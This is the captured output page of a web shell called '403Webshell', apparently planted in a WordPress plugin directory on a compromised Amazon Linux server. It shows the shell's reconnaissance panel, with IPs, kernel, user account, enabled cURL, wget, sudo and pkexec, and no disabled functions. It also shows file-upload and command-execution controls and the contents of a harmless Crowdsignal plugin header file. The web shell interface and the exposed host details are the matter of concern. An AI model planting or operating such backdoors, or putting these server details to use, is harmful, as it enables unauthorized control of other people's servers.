403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.68
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tgnew/wp-content/plugins/polldaddy/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tgnew/wp-content/plugins/polldaddy/partials/html-admin-setup-header.php
<?php
/**
 * File containing the view used in the header of the setup pages.
 *
 * @package Crowdsignal_Forms\Admin
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}
?>
<div>
	<div id="cs-plugin-container">
		<div class='cs-lower'>
			<h1 id='crowdsignal__logo'><?php esc_html_e( 'Crowdsignal Settings', 'crowdsignal-forms' ); ?></h1>
			<?php
			// phpcs:ignore WordPress.Security.NonceVerification.Recommended
			if ( isset( $_GET['msg'] ) ) {
				// phpcs:ignore WordPress.Security.NonceVerification.Recommended
				switch ( $_GET['msg'] ) {
					case 'disconnect-fail':
						echo '<div class="error fade crowdsignal-message"><p>' .
						// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content is svg from internal lib
						esc_html__( 'Could not disconnect. Please try again.', 'crowdsignal-forms' ) .
						'</p></div>';
						break;
					case 'disconnected':
						echo '<div class="updated fade crowdsignal-message"><p>' .
						// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content is svg from internal lib
						esc_html__( 'Successfully disconnected from Crowdsignal.', 'crowdsignal-forms' ) .
						'</p></div>';
						break;
					case 'connected':
						echo '<div class="updated crowdsignal-message"><p>' .
						// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content is svg from internal lib
						esc_html__( 'Success! Your Crowdsignal account is successfully connected! You are ready!', 'crowdsignal-forms' ) .
						'</p></div>';
						break;
					case 'api-key-added':
						echo '<div class="updated crowdsignal-message"><p>' .
						// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content is svg from internal lib
						esc_html__( 'You have been connected to Crowdsignal.', 'crowdsignal-forms' ) .
						'</p></div>';
						break;
					case 'api-key-not-added':
						echo '<div class="error fade crowdsignal-message"><p>' .
						// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content is svg from internal lib
						esc_html__( 'Your API key has not been updated, please try again.', 'crowdsignal-forms' ) .
						'</p></div>';
						break;
				}
			}
			?>

Youez - 2016 - github.com/yon3zu
LinuXploit